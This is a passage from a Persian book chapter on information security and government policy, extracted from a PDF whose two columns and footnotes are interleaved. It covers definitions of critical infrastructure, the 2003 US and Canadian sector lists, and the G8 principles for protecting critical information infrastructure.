‫ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻭﺍﻛﻨﺸﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﻣـﺸﻜﻼﺕ‬ ‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‪ ١١‬ﻧـﺎﻡ ﮔﺮﻓﺘـﻪ ﺍﺳـﺖ‪.‬‬ ‫)‪ (ICT‬ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻗﻮﺍﻧﻴﻦ‬
‫ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ‪ ،‬ﺷــﺒﻜﻪﺍﻱ ﺍﺯ ﺳــﺮﻣﺎﻳﻪﻫــﺎﻱ ﻓﻴﺰﻳﻜــﻲ ﻭ‬ ‫ﺁﻧﻬﺎ ﺧﻸﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺎﻧﻊ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﻻﺯﻡ ﺑـﺮﺍﻱ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺍﻗﺘـﺼﺎﺩ ﻳـﺎ ﺭﻓـﺎﻩ ﻳـﻚ‬ ‫ﺍﻓــﺰﺍﻳﺶ ﺍﻣﻨﻴــﺖ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﺷــﻮﺩ ﻳــﺎ ﺧﻴــﺮ‪ .‬ﺩﺭ ﺣﻘﻴﻘــﺖ‬
‫ﻛﺸﻮﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺷﺒﻜﺔ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻳـﻚ ﺯﻳﺮﺳـﺎﺧﺖ‬ ‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﻋﻼﻗﻪﻣﻨﺪ ﺑـﻪ ﮔـﺴﺘﺮﺵ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛـﻪ ﺷـﺎﻣﻞ ﺗﻤـﺎﻣﻲ ﺑﺎﻧﻜﻬـﺎﻱ ﺧـﺼﻮﺻﻲ‪ ،‬ﺑﺎﻧـﻚ‬ ‫ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﺑﻨﺪ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﺁﻧﻬـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺮﻛﺰﻱ‪ ،‬ﺑﺎﺯﺍﺭﻫﺎﻱ ﻣﺒﺎﺩﻻﺕ ﻛﺎﻻ‪ ،‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺗﺒـﺎﺩﻝ ﭼـﻚ‪ ،‬ﻭ‬ ‫ﻣﺎﻟﻲ‪ ،‬ﻣﺎﻟﻜﻴﺖ ﺳﺎﻳﺒﺮ ﻭ ﺣﻤﺎﻳﺖ ﺍﺯ ﻣـﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ ﺍﻋﺘﻤـﺎﺩ ﻳـﺎ‬
‫ﺩﻳﮕﺮ ﻧﻬﺎﺩﻫﺎﻳﻲ ﻛﻪ ﺩﺭﮔﻴـﺮ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﻫـﺴﺘﻨﺪ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻌﺎﻣﻼﺕ ﺧﺎﺭﺝ ﺍﺯ ﺩﻧﻴﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬـﺎﻥ ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ ﺑـﺎ‬ ‫ﻧﻴﺴﺖ‪ .‬ﺍﺻﻼﺡ ﻗﻮﺍﻧﻴﻦ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴـﺮﺩ‪ .‬ﺷـﺒﻜﺔ ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ﻧﻴـﺰ‬ ‫ﺍﺯ ﺍﺻﻼﺣﺎﺕ ﺭﻭﻱ ﻗﻮﺍﻧﻴﻦ ﻛﻠﻲﺗﺮ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺗﻤﺮﻛﺰ ﺍﻳﻦ ﻛﺘـﺎﺏ‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺣﻴﺎﺗﻲ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺟـﺎﺩﻩﻫـﺎ‪ ،‬ﭘﻠﻬـﺎ‪ ،‬ﻛﺎﻧﺎﻟﻬـﺎ‪،‬‬ ‫ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ‬
‫ﺧﻄﻮﻁ ﺭﺍﻩﺁﻫﻦ ﻭ ﻓﺮﻭﺩﮔﺎﻫﻬﺎ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺯﻳﺮﺳـﺎﺧﺖ‬ ‫ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡﺷـﺪﻩ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ‬
‫ﺣﻤﻞ ﻭ ﻧﻘﻞ ﻏﺎﻟﺒـﹰﺎ ﻓﻴﺰﻳﻜـﻲ ﻭ ﻣﻜـﺎﻧﻴﻜﻲ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﻋﻤﻠﻜـﺮﺩ‬ ‫)ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﻭ ﻧﻴﺰ ﺿﻤﺎﺋﻢ ﺫﻛﺮ ﺷﺪﻩﺍﻧـﺪ( ﻭ ﺳـﺆﺍﻻﺕ ﺩﺭ‬
‫ﺻﺤﻴﺢ ﭼﺮﺍﻏﻬﺎﻱ ﺭﺍﻫﻨﻤﺎﻳﻲ‪ ،‬ﺑﺎﺯ ﻭ ﺑﺴﺘﻪ ﻛﺮﺩﻥ ﭘﻠﻬﺎ‪ ،‬ﺭﺍﻩﺍﻧﺪﺍﺧﺘﻦ‬ ‫ﭼﺎﺭﭼﻮﺏ ﻋﻤﻠﻜـﺮﺩ ﻭﺳـﻴﻌﺘﺮ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ‬
‫‪٩‬‬
‫ﻗﻄﺎﺭﻫﺎ ﻭ ﻛﻨﺘﺮﻝ ﺗﺮﺍﻓﻴـﻚ ﻫـﻮﺍﻳﻲ ﻫﻤـﻪ ﻭ ﻫﻤـﻪ ﺑـﻪ ﻋﻤﻠﻜـﺮﺩ‬ ‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻭﺍﮔﺬﺍﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺻﺤﻴﺢ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻫﻴﭻ ﺗﻌﺮﻳﻒ ﻣﺸﺨﺼﻲ ﺑﺮﺍﻱ ﮔﺮﻭﻫﻬـﺎﻱ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ‬
‫ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻭ ﻓﻬﺮﺳــﺖ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﻛــﻪ ﺗﻮﺳــﻂ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﺍﺯ ﻛـﺸﻮﺭﻱ ﺑـﻪ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻭ ﺍﺯ‬ ‫‪5‬‬ ‫‪Consumer Protection‬‬
‫‪6‬‬ ‫‪Data & Communications Privacy‬‬
‫‪7‬‬ ‫‪Intellectual Property Rights‬‬
‫‪8‬‬ ‫‪E-Commerce Framework‬‬
‫ﺩﺭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻭﻟﻴﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﻳﻚ ﺑﺨﺶ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﻃﻴـﻒ‬ ‫‪٩‬‬
‫‪10‬‬ ‫‪E-Security‬‬
‫‪11‬‬ ‫‪Critical Infrastructures‬‬ ‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑﺮ ﺗﻮﺳﻌﺔ ‪ ICT‬ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪٢٣٣‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺍﺯ ﺟﻤﻠـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ‪ ١٥‬ﻭ‬ ‫ﺯﻣﺎﻧﻲ ﺗﺎ ﺯﻣﺎﻥ ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ‪ .‬ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ‬
‫ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﺗﺎ ﺣﺪﻭﺩﻱ ﻣـﻲﺗﻮﺍﻧـﺪ‬ ‫ﺩﻭﻟﺖ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﺓ ﺁﻣﺮﻳﻜﺎ ﻛﻪ ﺩﺭ ﻓﻮﺭﻳﻪ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺑﻪ ﭼـﺎﭖ‬
‫ﻲ ﻣﻮﺟﻮﺩ ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬ ‫ﺩﺭ ﻣﺤﺪﻭﺩﻩ ﻣﺆﺳﺴﺎﺕ ﻭ ﺧﻄﻮﻁ ﺗﻮﻟﻴﺪ ﺻﻨﻌﺘ ﹺ‬ ‫ﺭﺳــﻴﺪ‪ ۱۳ ،‬ﮔــﺮﻭﻩ ﺯﻳﺮﺳــﺎﺧﺖ ﺣﻴــﺎﺗﻲ ﺭﺍ ﻣــﺸﺨﺺ ﻣــﻲﺳــﺎﺯﺩ‪:‬‬
‫ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ ﺩﺭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺷﺎﻣﻞ ﺍﺗﺤﺎﺩﻳﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ‪،‬‬ ‫‪ (۱‬ﻛﺸـــﺎﻭﺭﺯﻱ‪ (۲ ،‬ﺗﻐـــﺬﻳﻪ‪ (۳ ،‬ﺁﺏ‪ (۴ ،‬ﺑﻬﺪﺍﺷـﺖ ﻋﻤـﻮﻣﻲ‪،‬‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﻭ ﺳـﺎﻳﺮ ﺷـﺮﻛﺘﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺻـﻨﺎﻳﻊ‬ ‫‪ (۵‬ﺧـــﺪﻣﺎﺕ ﺍﺿـــﻄﺮﺍﺭﻱ‪ (۶ ،‬ﺩﻭﻟـــﺖ‪ (۷ ،‬ﺻـــﻨﺎﻳﻊ ﺩﻓـــﺎﻋﻲ‪،‬‬
‫ﻣﺨﺘﻠﻒ ﻣﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻛﺜﺮ ﻛﺸﻮﺭﻫﺎ ﺩﺭ ﺑﺨﺶ ﺩﻭﻟﺘـﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ‬ ‫‪ (۸‬ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻩ ﺩﻭﺭ‪ (۹ ،‬ﺍﻧﺮﮊﻱ‪ (۱۰ ،‬ﺣﻤﻞ ﻭ ﻧﻘـﻞ‪،‬‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈـﺎﺭﺗﻲ‬ ‫‪ (۱۱‬ﺑﺎﻧﻜﺪﺍﺭﻱ ﻭ ﺍﻣﻮﺭ ﻣﺎﻟﻲ‪ (۱۲ ،‬ﻣـﻮﺍﺩ ﺷـﻴﻤﻴﺎﻳﻲ ﻭ ﭘﺮﺧﻄـﺮ‪ ،‬ﻭ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪) .‬ﻣﺜﻞ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻄﻮﺭ ﺳـﻨﺘﻲ ﺑﺎﻧﻜـﺪﺍﺭﻱ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﺍﻩ‬ ‫‪ (۱۳‬ﺧﺪﻣﺎﺕ ﭘﺴﺘﻲ ﻭ ﻛﺸﺘﻴﺮﺍﻧﻲ‪ ١٢.‬ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ‬
‫ﺩﻭﺭ ﻭ ﺑﺨﺸﻬﺎﻱ ﺍﻧﺮﮊﻱ ﺭﺍ ﻗﺎﻧﻮﻧﻤﻨﺪ ﻛﺮﺩﻩﺍﻧﺪ(‪.‬‬ ‫ﺷﺪﻩ‪ ،‬ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﺎﻧـﺎﺩﺍ ﺗﻨﻬـﺎ ﺍﺯ‬
‫ﺷﺶ ﮔﺮﻭﻩ ﻧﺎﻡ ﻣﻲﺑﺮﺩ‪ (۱ :‬ﺍﺭﺗﺒﺎﻃـﺎﺕ‪ (۲ ،‬ﺩﻭﻟـﺖ‪ (۳ ،‬ﺍﻧـﺮﮊﻱ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ﭘﻴﺸﻘﺪﻡ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ‬
‫ﺻﻨﺎﻳﻊ ﻫﻤﮕﺎﻧﻲ‪ (۴ ،‬ﺧﺪﻣﺎﺕ )ﻛـﻪ ﺩﺭ ﻛﺎﻧـﺎﺩﺍ ﺷـﺎﻣﻞ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪،‬‬
‫ﻛﻪ ﺩﺭ ﻣﻘﻴﺎﺱ ﺑﺰﺭﮔﺘﺮﻱ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻫﻤﻜـﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬ ‫‪١٣‬‬
‫ﺗﻮﺯﻳﻊ ﻏﺬﺍ‪ ،‬ﻭ ﺑﻬﺪﺍﺷـﺖ ﺍﺳـﺖ(‪ (۵ ،‬ﺍﻣﻨﻴـﺖ‪ ،‬ﻭ ‪ (۶‬ﺣﻤـﻞ ﻭ ﻧﻘـﻞ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﮔﺮﻭﻩ ‪G8‬ﺩﺭ ﻣﺎﻩ ﻣـﻲ ﺳـﺎﻝ ‪ ۱۱ ، ۲۰۰۳‬ﺍﺻـﻞ ﺭﺍ‬
‫ﺗﻌﺮﻳﻒ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ‪ ،‬ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺩﺭﻙ‬
‫ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺗﻮﺳـﻌﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ‬ ‫‪١٤‬‬
‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ‪ ،‬ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﻧﻴﺴﺖ‪.‬‬
‫ﺯﻳﺮﺳﺎﺧﺖ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ١٦.‬ﺍﻳﻦ ﺍﺻـﻮﻝ‬
‫ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬ ‫ﻣﻔﻬﻮﻡ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑـﻪ ﺩﻻﻳـﻞ ﺯﻳـﺎﺩﻱ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ‬
‫ﺍﺳﺖ‪ .‬ﺍﻭﻝ‪ ،‬ﺑﻪ ﺭﻭﺷﻦ ﺷﺪﻥ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛـﻪ ﭼـﺮﺍ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪﺓ ﺍﺿـﻄﺮﺍﺭﻱ‬ ‫‪.۱‬‬
‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﻢ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺩﺭﻙ ﻛﻨﻨـﺪ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﺣﻮﺍﺩﺙ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭘﻮﻝ ﺩﺭ ﺑﺎﻧﻜﻬـﺎ ﻏﻴـﺮ ﻗﺎﺑـﻞ ﭘﺮﺩﺍﺧـﺖ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﺩﺍﻧﺶ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ ﺗـﺎ‬ ‫‪.۲‬‬ ‫ﻣﻲﺷﻮﺩ‪ ،‬ﻗﻄﺎﺭﻫﺎ ﻗﺎﺩﺭ ﺑﻪ ﺗﺮﻙ ﺍﻳﺴﺘﮕﺎﻩ ﻧﻤﻲﺑﺎﺷـﻨﺪ ﻭ ﺣﺘـﻲ ﺁﺏ‬
‫ﺑﻪ ﺩﺭﻙ ﺍﻓﺮﺍﺩ ﺍﺯ ﻣﺎﻫﻴﺖ ﻭ ﻭﺳﻌﺖ ﺯﻳﺮﺳـﺎﺧﺖ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺁﺷﺎﻣﻴﺪﻧﻲ ﭘﻤﭗ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺑﻬﺘﺮ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧـﺴﺖ ﺁﺛـﺎﺭ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﺣﺴﺎﺱ ﺧﻮﺩ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ ﻭ ﻧﻘـﺶ ﺁﻧﻬـﺎ ﺭﺍ ﺩﺭ ﺭﺍﺳـﺘﺎﻱ‬ ‫ﻧﺎﺷــﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺩﺭﻙ ﻛﻨﻨــﺪ‪ .‬ﺩﻭﻡ‪ ،‬ﮔﺮﻭﻫﻬــﺎﻱ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ‪.‬‬ ‫ﺯﻳﺮﺳــﺎﺧﺘﻲ ﺑــﻪ ﺍﻳــﻦ ﺩﻟﻴــﻞ ﺍﻫﻤﻴــﺖ ﺩﺍﺭﻧــﺪ ﻛــﻪ ﺑــﻪ ﺗﻌﺮﻳــﻒ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﻣـﻮﺭﺩ ﻣﻄﺎﻟﻌـﻪ ﻗـﺮﺍﺭ‬ ‫‪.۳‬‬ ‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺟﻮﺍﻣﻊ ﻛﻤـﻚ ﻣـﻲ ﻛﻨﻨـﺪ ﻭ ﺟـﻮﺍﻣﻌﻲ ﺑـﺎ ﻋﻼﻳـﻖ‬
‫ﺩﻫﻨﺪ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺘﻘﺎﺑﻞ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﺳـﺎﺯﻧﺪ ﻭ‬ ‫ﻣﺸﺘﺮﻙ ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﻧﻴﺎﺯ ﺑﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻨﺪ‪.‬‬ ‫ﺩﺍﺭﻧﺪ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺻﻨﻌﺘﮕﺮﺍﻥ ﺻـﻨﻌﺖ ﺑـﺮﻕ ﻭ‬
‫ﻣﺴﺘﺸﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻣﺸﺎﺭﻛﺖ ﻳﻜﺪﻳﮕﺮ ﻧﻘـﺶ ﻣﺜﺒﺘـﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﻣﺸﺎﺭﻛﺖ ﻣﻴـﺎﻥ ﺑﺨـﺶ ﻋﻤـﻮﻣﻲ ﻭ ﺑﺨـﺶ‬ ‫‪.۴‬‬
‫ﺩﺭ ﺭﻓﻊ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﺮﻕ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺯﻳﺮﺳـﺎﺧﺘﻲ ﻣﻬـﻢ‬
‫ﺧــﻮﺩ ﺭﺍ ﻣــﻮﺭﺩ ﺗﺠﺰﻳــﻪ ﻭ ﺗﺤﻠﻴــﻞ ﻗــﺮﺍﺭ ﺩﻫﻨــﺪ ﻭ ﺁﻧﻬــﺎ ﺭﺍ‬
‫ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﺳﻴﺐﺩﻳﺪﻥ ﺁﻧﻬـﺎ ﺗـﺎ ﺣـﺪ‬ ‫‪12‬‬ ‫‪The National Strategy to Secure Cyberspace‬‬
‫ﺍﻣﻜﺎﻥ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨـﺪ ﻭ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﻩ‬ ‫]‪[U.S.‬‬
‫‪http://www.whitehouse.gov/pcipb‬‬
‫ﻭﺍﻛﻨﺶ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪.‬‬ ‫‪http://www.dhs.gov/interweb/assetlibrary/Natio‬‬
‫‪nal_Cyberspace_Strategy.pdf‬‬
‫‪13‬‬ ‫& ‪Office of Critical Infrastructure Protection‬‬
‫ﻛﺸﻮﺭﻫﺎ ﺑﺎﻳﺪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺯﻣﺎﻥ‬ ‫‪.۵‬‬ ‫]‪Emergency Prepareness [Canada‬‬
‫‪http://www.ocipep.gc.ca/home/index_e.asp‬‬
‫ﺑﺤﺮﺍﻥ ﺍﻳﺠﺎﺩ ﻭ ﺍﺯ ﺁﻥ ﻧﮕﻬـﺪﺍﺭﻱ ﻛﻨﻨـﺪ‪ ،‬ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﻣـﻮﺭﺩ‬ ‫ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺟﺰﺋﻴﺎﺕ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑـﻪ ﻣـﺴﺌﻠﻪ‬ ‫‪۱۴‬‬
‫ﺣﻔﺎﻇـــﺖ ﺍﺯ ﺯﻳﺮﺳـــﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـــﻲ ﻣـــﻲﺗﻮﺍﻧﻴـــﺪ ﺑـــﻪ ﻛﺘـــﺎﺏ‬
‫‪International Critical Information Infrastructure‬‬
